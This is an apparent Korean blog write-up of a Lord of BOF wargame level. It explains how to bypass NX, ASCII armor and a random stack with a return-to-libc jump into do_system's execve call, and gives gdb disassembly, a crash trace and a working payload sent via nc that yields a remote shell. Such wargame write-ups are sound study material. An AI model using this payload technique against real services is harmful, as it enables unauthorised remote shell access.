
[LOB_FC3] dark_eyes ->hell_fire

bbolmin 2014. 7. 12. 12:21



#Env 


- NX

- ascii armor

- random stack


#Technic


- do_system RTL



hell_fire.c 소스



[dark_eyes@Fedora_1stFloor ~]$ cat /etc/xinetd.d/hell_fire

service hell_fire

{

        disable = no

        flags           = REUSE

        socket_type     = stream

        wait            = no

        user            = hell_fire

        server          = /home/dark_eyes/hell_fire

}



1. xinetd로 데몬이 구동되고 있어서 소켓이 자동으로 표준입출력에 연결된다.

2. system 함수를 사용할 때 local 환경에서는 bash의 disable_priv_mode() 함수에 의해 euid를 현재 사용자의 uid로 변경하지만, remote 환경에서는 xinetd 설정의 user = hell_fire 때문에 처음부터 uid와 euid가 모두 hell_fire이므로 떨어뜨릴 권한이 없어 그대로 권한을 받아온다.








exploit은 execve("/bin/sh", 0, 0)을 실행하는 곳으로 RTL하는 것이다.


system -> do_system -> "/bin/sh"를 실행하는 execve 주소



(gdb) disass system

Dump of assembler code for function system:

0x007507c0 <system+0>:  push   %ebp

0x007507c1 <system+1>:  mov    %esp,%ebp

0x007507c3 <system+3>:  sub    $0xc,%esp

....

0x007507fe <system+62>: jmp    0x750320 <do_system>

0x00750803 <system+67>: lea    0xffff4617(%ebx),%eax

0x00750809 <system+73>: call   0x750320 <do_system>



(gdb) disass do_system
Dump of assembler code for function do_system:
0x00750320 <do_system+0>:       push   %ebp
0x00750321 <do_system+1>:       mov    $0x1,%edx
.....
0x00750775 <do_system+1109>:    mov    %esi,0x4(%esp)
0x00750779 <do_system+1113>:    lea    0xfffffec4(%ebp),%esi
0x0075077f <do_system+1119>:    call   0x743d30 <sigprocmask>
0x00750784 <do_system+1124>:    mov    0xfffffec4(%ebx),%ecx <- jump
0x0075078a <do_system+1130>:    xor    %edx,%edx
0x0075078c <do_system+1132>:    xor    %eax,%eax
0x0075078e <do_system+1134>:    mov    %edx,0x16bc(%ebx)
0x00750794 <do_system+1140>:    lea    0xffff460f(%ebx),%edx
0x0075079a <do_system+1146>:    mov    (%ecx),%edi
0x0075079c <do_system+1148>:    mov    %eax,0x16b8(%ebx)
0x007507a2 <do_system+1154>:    mov    %esi,0x4(%esp)
0x007507a6 <do_system+1158>:    mov    %edi,0x8(%esp)
0x007507aa <do_system+1162>:    mov    %edx,(%esp)
0x007507ad <do_system+1165>:    call   0x7a5490 <execve>




[000a6161] --- SIGSEGV (Segmentation fault) @ 0 (0) ---

upeek: ptrace(PTRACE_PEEKUSER,3454,48,0): No such process

[????????] +++ killed by SIGSEGV +++


[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x270, "\n"';cat)|strace -i ./hell_fire




payload : | 268 dummy | &<do_system+1124> | (0x00750784 → "\x84\x07\x75\x00", ascii armor로 인한 상위 바이트 0x00이 payload의 마지막에 오므로 문제되지 않는다)


[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x268, "\x84\x07\x75\x00"';cat)| nc 192.168.11.137 7777

hell_fire : What's this smell?

you :


id

uid=503(hell_fire) gid=503(hell_fire) context=user_u:system_r:unconfined_t

my-pass

euid = 503

sign me up